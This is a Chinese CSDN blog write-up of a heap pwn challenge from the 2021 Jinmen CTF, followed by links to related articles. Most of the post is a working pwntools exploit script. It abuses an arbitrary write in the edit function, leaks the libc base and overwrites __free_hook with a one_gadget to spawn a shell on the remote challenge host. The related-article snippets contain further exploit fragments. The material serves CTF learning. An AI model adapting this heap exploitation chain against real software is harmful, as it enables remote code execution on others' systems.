津门杯2021CTF pwn解

最新推荐文章于 2023-07-22 16:43:31 发布
最新推荐文章于 2023-07-22 16:43:31 发布
阅读量495 收藏
点赞数
分类专栏: CTF PWN 文章标签: html
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39948058/article/details/119938794
版权
CTF 同时被 2 个专栏收录
32 篇文章 2 订阅
订阅专栏
PWN
29 篇文章 0 订阅
订阅专栏
本文讲述了作者在解决一道pwn题时的经历,通过审计代码发现了两个漏洞点,利用edit功能实现了任意写。在泄露libc基址后,通过计算偏移找到onegadget并修改__free_hook,最终实现远程代码执行。由于开始忽视了结构体细节,导致初次尝试失败,但通过调整策略成功完成。
摘要由CSDN通过智能技术生成

前言:这个题一开始调通了,但是不知道正确的libc版本,远程没有打通,最后听了一下libc版本是11.4的libc2.23版本,才打通,题很多洞,比较经典的是edit的READ容易写。写到freehook为onegadget即可,tcl,只解了一道题,时间原因第二道pwn题也没看,噗。。

漏洞点:

5AU}9Q0ZJY$O%E{​{Z4~W~AG.png

GI1)UMU(M2DET)87Y6A4HYH.jpg

 

漏洞点这两个地方,他们都是在bss段里,而且位置比较临近可以直接考虑一下任意写,当时没太注意这个点,直接doublefree的,发现只给了4个chunk,所以没能构建出,又审计了一下edit READ发现可以实现任意写,算好偏移即可
1.泄露libc
2.利用edit往freehook进行写即可
exp:

#coding:utf-8
from pwn import *
#p=process('./hello')
p=remote('119.3.81.43', '49153')
context(arch="amd64",os="linux",log_level="debug")
def add(number,name,size,info):
    p.sendlineafter('>>','1')
    p.sendlineafter('number:',str(number))
    p.sendlineafter('name:',name)
    p.sendlineafter('size:',str(size))
    p.sendlineafter('info:',info)
 
def delete(idx):
    p.sendlineafter('>>','2')
    p.sendlineafter('index:',str(idx))
 
 
def show(idx):
    p.sendlineafter('>>','3')
    p.sendlineafter('index:',str(idx))
 
def edit(idx,number,name,info):
    p.sendlineafter('>>','4')
    p.sendlineafter('index:',str(idx))
    p.sendlineafter('number:',number)
    p.sendlineafter('name:',name)
    p.sendlineafter('info:',info)
 
 
#p=process('./hello')
libc=ELF('/home/roo/桌面/glibc-all-in-one-master/glibc-all-in-one-master/libs/2.23-0ubuntu11.2_amd64/libc.so.6')
add(0,'maxbos0',0x80,'d'*0x48+'\x90'+'\x70')
add(1,'maxbos1',0x48,'dd')
delete(0)
add(2,'maxbos',0x48,'')
edit(2,'-3','dd','')
show(2)
libc_1=u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))+22#+0xa0bf+0x1fa8#+0x10bf+20480
print hex(libc_1)
libc_base=libc_1-0x3c4b20
'''
0x45226 execve("/bin/sh", rsp+0x30, environ)
constraints:
  rax == NULL
 
0x4527a execve("/bin/sh", rsp+0x30, environ)
constraints:
  [rsp+0x30] == NULL
 
0xf0364 execve("/bin/sh", rsp+0x50, environ)
constraints:
  [rsp+0x50] == NULL
 
0xf1207 execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL
'''
rce=libc_base+0x4527a
free_hook=libc_base+libc.sym['__free_hook']
print hex(free_hook)
edit(2,'2','a'*13+p64(free_hook),p64(rce))
delete(2)
p.interactive()

3)K$QKIVNO<code>@</code>93FG4K$B70.png

 

总结:本菜鸡最大的缺点还是审计上,老是看到代码出现了好多结构体都懒得看了,哎只能慢慢培养了,还有一点的是,我调试的时候不知道系统关闭了随机化,系统奔了一下,发现libc的基地址不对了,导致我。重新调了一遍,草草草草了!!!!

jsjsj11123
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
津门pwn
清霂的博客
05-13 302
目录hello 嘿嘿,单独发纪念一下,首次在国内比赛做出一道pwn题(23/59) hello #!/usr/bin/env python2 # coding=utf-8 from pwn import * arch = "amd64" filename = "hello" context(os="linux", arch=arch, log_level="debug") content = 0 offset = 0 # elf elf = ELF(filename) free_got=elf.got
津门2021CTF&红帽2021CTF pwn复现
qq_39948058的博客
08-26 658
前言:这次的比赛时间重合了,刚了一下津门的一个pwn题,就没再看红帽的题了,tcl,因此这次复现是参考了nu1l的wp和白帽社区的wp,题的质量对于我这种菜鸟蛮高的 一、PwnCtfme 此题通过复现算是一个比较常规的堆题了,因为时间原因没看这道题,一个off-by-null,操作看exp吧,出自于nu1l wp exp: #coding:utf-8 from pwn import * context(arch="amd64",os="linux",log_level="debug") p=pr
蓝帽CTF2021 pwn
qq_39948058的博客
08-26 455
一、slient 一道原题,直接付出脚本进行打 from pwn import * EXCV = context.binary = './chall' e = ELF(EXCV) if args.I: context.log_level = 'debug' def pwn(p, index, ch): # open shellcode = "push 0x10032aaa; pop rdi; shr edi, 12; xor esi, esi; push 2; pop
CTF 一次PWN题的小技巧
yy1715713348的博客
07-22 356
行文至此,本次测试也就结束了!文章略长,简单做个总结:在本文中,我们通过使用CTF示例讨论了漏洞利用开发的过程,我们了了程序如何从argv和argc接收输入的参数。最后,了了由于较小的随机范围,32位系统中的ASLR为何容易受到攻击,以及如何利用此漏洞进行攻击。我们可以使用 "scp "命令轻松地将我们的脚本上传到服务器的tmp目录下,就像这样。[外链图片转存中…(img-lYig6HAY-1690015362559)]终于拿到了我们的flag!行文至此,本次测试也就结束了!
2021-第五届世界智能大会-「津门」国际网络安全创新大赛-Web-hate_php
weixin_40872714的博客
03-29 2509
2021-第五届世界智能大会-「津门」国际网络安全创新大赛-Web-hate_php 打开网址直接告诉你过滤的代码,把字母数字和$、_、@都过滤了,直接放弃 然后百度搜了这道题的答案,感觉发现了新大陆一样,下面是相关的几篇文章,强烈推荐阅读: 过滤了大写字母和数字的绕过方法: https://www.leavesongs.com/PENETRATION/webshell-without-alphanum.html 过滤了大小写字母、数字、‘$’和‘_’ https://www.leavesongs.co
中山市香山 2021 CTF zip
12-07
中山市香山 2021 CTF zip
赣网2021_pwn1.rar
12-11
赣网2021 pwn1 bin ctf
安恒ctf pwn课件
10-06
安恒培训资料 栈溢出指的是程序向栈中某个局部变量中写入的字节数超过了这个变量本身所申 请的字节数,因而导致与其相邻的栈中的变量的值被改变。 Ø 程序能够向栈上写入数据。 Ø 写入的数据大小没有被良好地控制。...
赣网2021_pwn2.rar
12-11
赣网2021 pwn1 bin ctf
领航 CTF 2021 决赛 真题 7z
12-07
领航 CTF 2021 决赛
WICCTF-2021-pwnCTFM
05-12
2021年津门ctf的pwn题。
WICCTF-2021-easypwn
05-12
2021津门ctf的第一道pwn题。
ciscn2021CTF国赛pwn
qq_39948058的博客
08-27 1323
CTF2021-05-18 总结:这次pwn的比赛难易程度尚可,菜菜的我在各位师傅的领导下勉勉强强做出了3道pwn,这三道pwn都不算太难,一道越界,越界pwny这道题确实把我搞吐了,后期卡在了ret的与数组的偏移,这个不会计算,在th1un师傅的领导下,才知道了如何计算,勉强做出来了,值得说的是数组越界在2021年比赛中出现的越来越频繁了,是真的频繁了,第二道pwn是一个堆,只不过index受到了限制,既然index受到了限制并不影响我们在同一个index构造多个chunk,所以这个题也是常规操作.
2021年“莲城”网络安全大赛-PWN-pwn10(三血)
qq_43264813的博客
10-12 880
2021年“莲城”网络安全大赛-PWN-pwn10 题目名称:pwn10 题目内容:栈溢出。靶机:nc 183.129.189.60 10016 题目分值:100.0 题目难度:容易 相关附件:pwn10的附件.zip 题思路: 1.保护机制,静态链接,没pie 2.主要函数 3.做pwn要注意重点,输入一个长字符串,能把name冲掉,反正是个很大的数字,不用关注count是多少,反正够用。然后用不可寻址的地址找到偏移0x78,然后 rop syscall ```python #!/usr/bin/
2021年津门ctf线上赛记录(WICCTF)
lifanxin的博客
05-12 1955
津门ctf线上赛概述pwn题easypwnpwnCTFM总结 概述   本篇博客记录下自己的第一次ctf比赛经历,其实不完全是第一次,之前也参加过其他比赛,但只能做个签到就走了,这次不一样了,好歹做出了一道pwn题,有一道本来是有机会的,搞错libc了,线上没拿到flag,不过线上复现了下,感觉还行。因此特写下此篇博文,记录自己的一血。???? pwn题   我个人现在只会做做pwn题,后面打算也看看web,提升一下综合实力,这里介绍下比赛中的两道pwn题,和官方wp不一样,这里是我自己的思路。 easy
__malloc_hook和__free_hook劫持原理
Grxer的博客
03-20 968
Hook即钩子,截获API调用的技术,是将执行流程劫持到你自己的代码。刚开始在Ubuntu22上做实验,一直不成功,又换了kali,还是不行,最后发现__free_hook,__malloc_hook,__realloc_hook,_after_morecore_hookg在libc-2.34的patch中被移除了,换了Ubuntu16 libc版本2.23,但是发现只是在ld链接时会找不到definition,也就是无法通过链接的环节,但是在libc库里还是有的,可能是考虑之前使用hook程序的兼容。
pwn题堆利用的一些姿势 -- free_hook
lifanxin的博客
04-16 4708
free_hook概述初级必备姿势常规搭配姿势按需进阶姿势总结 pwn题堆利用的一些姿势 – malloc_hook 概述   在做堆题的时候,经常会遇到保护全开的情况,其中对利用者影响最大的是PIE保护和Full RELRO,NX保护和栈保护对堆利用来说影响都不大,一般利用也不会往这方面靠。开了PIE保护的话代码段的地址会变,需要泄露代码段基地址才能利用存储在bss段上的堆指针;开了Full RELRO的话,则意味着我们无法修改got表,导致无法修改其它函数got表指向system,进一步获取到shell
CTF刷题记录11.9WP_几道MISC题复现
weixin_40103894的博客
11-09 935
津门-m0_01 【键盘流量|云影密码(01248)】津门2021-m1 【StegSolve提取字符串】津门-tunnel 【DNS流量分析|文件提取|base64隐写】江苏工匠-来自银河的信号 【sstv慢速扫描|栅栏密码】
一道题目入门VMpwn
qq_40712959的博客
04-16 329
一道题目学习VMpwn 原理 VMpwn 程序通常都是模拟一套虚拟机,对用户输入的opcode进行析,模拟程序的执行,故VMpwn常见设计如下: 初始化分配模拟寄存器空间(reg) 初始化分配模拟栈空间(stack) 初始化分配模拟数据存储空间(data) 初始化分配模拟机器指令(opcode)空间(text) [OGeek2019 Final]OVM 程序采用32bit定长指令,每个操作码、操作数均为8bit,其格式为: | opcode | dst | op1 | op2 | 程序具体指令参考
ctf pwn 计算器
最新发布
10-05
引用是一段代码,它使用了Python的pwn库来进行CTF中的pwn攻击。pwn攻击是指通过分析程序本身的漏洞,编写利用脚本来获取主机权限。这种攻击需要对程序进行深入分析,了操作系统的特性和相关漏洞。因此,CTF pwn...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值